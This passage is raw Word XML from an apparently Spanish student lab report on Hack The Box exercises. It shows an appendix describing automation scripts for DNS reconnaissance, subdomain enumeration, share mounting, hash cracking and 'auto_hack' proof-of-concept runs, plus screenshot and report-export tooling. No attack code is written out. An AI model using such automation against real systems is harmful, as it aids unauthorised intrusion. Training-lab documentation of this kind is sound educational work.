                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3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Evidencia 05: Resolución de Máquina Meow en Hack The Box por Lozano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_dca1f7962bc6612d00da02eb255510822218507"/>
      <w:r>
        <w:t xml:space="preserve">6. Anexo de Automatización e Infraestructura del Laboratorio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_ecc5d5ff89a47330315e39acc0bb05e96d11eb9"/>
      <w:r>
        <w:t xml:space="preserve">6.1 Scripts de Ejecución Idempotente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El laboratorio cuenta con un conjunto de scripts diseñados para garantizar la repetibilidad y el principio de mínimo impacto (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-Footprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/practicas/parcial1_practicas_01_a_06.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Automatiza el reconocimiento DNS, enumeración de subdominios, montajes CIFS/NFS y crackeo de hashes con pausas interactivas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/kali-lab-state.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Gestiona de manera idempotente los registros en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, montajes en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, permisos de llaves y túneles SSH.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_hack.sh.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_hack_parte2.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Proveen la automatización guiada para pruebas de concepto en entornos de evaluación rápida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_dbf1ee55963b953023f75203970b3c90cfa8dd7"/>
      <w:r>
        <w:t xml:space="preserve">6.2 Captura Directa de Framebuffer VirtualBox (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vm-snap.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para eliminar artefactos visuales del anfitrión, bordes de ventanas o fallos por pérdida de foco, las capturas de pantalla se obtienen directamente de la memoria gráfica de la máquina virtual mediante la API del hipervisor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\scripts\vm-snap</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VmName </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Kali-Linux-CLI"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OutputPath </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"docs/assets/practica1_nosqli/01_nosqli_flag.png"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_4bd76c8ea267e1b2199c47475ecadfb206c5baf"/>
      <w:r>
        <w:t xml:space="preserve">6.3 Pipeline de Generación a DOCX y Sincronización con Google Docs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El flujo de entrega técnica está automatizado mediante Pandoc y el CLI oficial de Google Workspace (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@googleworkspace/cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Compilación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Pandoc procesa el documento Markdown resolviendo las rutas de los activos visuales:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell    pandoc docs/reportes/REPORTE_PRACTICAS_LOZANO.md -o docs/reportes/Reporte_Final_Lozano.docx --resource-path=.:docs:docs/reportes:docs/assets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exportación a la Nube</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/build-report.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detecta las credenciales activas y sube el archivo resultante a Google Drive especificando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mimeType: application/vnd.google-apps.document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esto genera un documento de Google Docs nativo, completamente editable, con estilos, tablas y capturas preservadas.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2026-10-21T05:44:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-21T05:44:37Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>